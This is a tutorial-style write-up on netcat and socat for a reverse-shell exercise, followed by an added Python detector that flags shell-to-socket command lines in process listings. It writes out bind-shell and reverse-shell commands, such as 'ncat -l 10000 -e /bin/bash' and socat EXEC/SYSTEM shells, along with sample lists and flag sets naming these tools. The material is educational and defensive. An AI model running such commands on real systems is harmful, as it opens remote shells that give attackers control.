Write-up to Simple Netcat Socat Reverse Shells
In an exercise, the reverse shell is to be created with Netcat. According to Wikipedia, this program is fairly general-purpose:
- Outgoing or incoming connections, TCP or UDP, to or from any port.
- Full DNS forward/backward checking, with appropriate warnings.
- Ability to use any local source port
- Ability to use any locally configured network source address
- Built-in port scanning capabilities with random number generator
- Built-in loose source routing capability
- Can read command line arguments from standard input
- Slow send mode, one line every N seconds
- Hex dump of sent and received data
- Optional ability to let another program service establish connections
- Optional telnet options responder
The shell tool is usually nc or ncat. The configuration is easier to understand if you keep in mind that nc works in two modes. Connect mode allows, for example, the output of local programs to be sent over the network (e.g. to socat). Listen mode does exactly the opposite: it waits until someone sends it data. In ncat, connect mode is the default. The ncat documentation is very helpful. For example, ncat makes TCP connections by default, and with -u you can switch to UDP.
Examples for ncat
Examples for connect
ncat elsensohn.ch 80
# then type inside the program:
GET /
# Result is an HTTP HTML page
Examples for listen
ncat -l 8080
# Connect afterwards with e.g. telnet:
telnet localhost 8080
Examples for sending / receiving of a file
# receive a file (the listener writes whatever it receives to file.txt)
ncat -l 8080 > file.txt
# send a file (connect to the listener and send data.txt)
ncat 192.168.1.100 8080 --send-only < data.txt
Remote Code Execution Example
# run received text in bash
ncat -l 10000 -e /bin/bash
# send text to be interpreted by the receiver (works also with other tools);
# the client must use the same port the listener is bound to
ncat localhost 10000
In the exercise, socat is also used; it is a relay for bidirectional data transfer between two independent data channels. There are many types of channels that socat can connect, including (see Getting Started Socat):
- Sockets (UNIX, IP4, IP6 - raw, UDP, TCP)
- file descriptors (stdin, etc.)
According to Getting Started Socat, netcat and socat do similar things, but socat has more additional functionality, such as allowing multiple clients on a port or reusing connections.
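From the defender's side, the Remote Code Execution example above (ncat in listen mode with -e /bin/bash) and socat's ability to attach a program to a socket leave a recognisable footprint in process listings and exec audit records. The following is an added example, not part of the original write-up: it classifies constructed command lines, flagging netcat/ncat and socat invocations that attach a program to a socket and reporting whether the tool is in listen or connect mode. The sample command lines, the hypothetical tool-name set and the flag set are assumptions made for the example.

```python
import re
import shlex

# Constructed sample command lines (not from the original page), as they might
# appear in a ps listing or an auditd EXECVE record.
SAMPLE_CMDLINES = [
    "ncat -l 10000 -e /bin/bash",                    # listener with a shell attached
    "nc -lvp 4444 -c /bin/sh",                       # same idea, -l bundled into -lvp
    "ncat 192.168.1.100 8080 --send-only",           # plain file transfer: benign
    "socat TCP-LISTEN:9001,reuseaddr,fork EXEC:/bin/bash,pty,stderr",
    "socat TCP4:10.0.0.5:443 SYSTEM:/bin/sh",        # connect mode, shell attached
    "ncat elsensohn.ch 80",                          # ordinary client: benign
    "grep -e pattern file.txt",                      # -e on another tool: ignore
]

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}  # assumed set
NC_EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}
SOCAT_SHELL_ADDR = re.compile(r"^(EXEC|SYSTEM):", re.IGNORECASE)

def _nc_listens(args):
    """True if --listen is given or a short flag cluster contains 'l' (-l, -lvp)."""
    return any(a == "--listen" or (a.startswith("-") and not a.startswith("--")
                                   and "l" in a[1:]) for a in args)

def classify(cmdline):
    """Return (tool, mode, program) when a netcat/ncat or socat command line
    attaches a program to a socket; None for anything else."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None  # unbalanced quotes: unparseable, skip
    if not argv: return None
    tool, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    if tool in NC_NAMES:
        mode = "listen" if _nc_listens(args) else "connect"
        for i, a in enumerate(args):
            if a in NC_EXEC_FLAGS and i + 1 < len(args):
                return (tool, mode, args[i + 1])
            if a.startswith(("--exec=", "--sh-exec=")):
                return (tool, mode, a.split("=", 1)[1])
    elif tool == "socat":
        mode = "listen" if any("LISTEN" in a.upper() for a in args) else "connect"
        for a in args:
            if SOCAT_SHELL_ADDR.match(a):  # program = text after "EXEC:" up to first comma
                return (tool, mode, a.split(":", 1)[1].split(",", 1)[0])
    return None

def find_shell_bindings(cmdlines):
    """Pair every flagged command line with its (tool, mode, program) triple."""
    return [(c, r) for c in cmdlines if (r := classify(c))]
```

On a real host the input would come from a periodic process snapshot or from parsed exec audit events; a hit in listen mode on an unexpected port is the stronger signal, since it is the pattern the exercise's -e example produces.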
Is it possible to use UDP?
Yes, with the -u parameter.
Can you run an HTTP endpoint with netcat?
You could put netcat in between to do port redirection, for example. But it needs an HTTP server behind it, because netcat only does the transfer.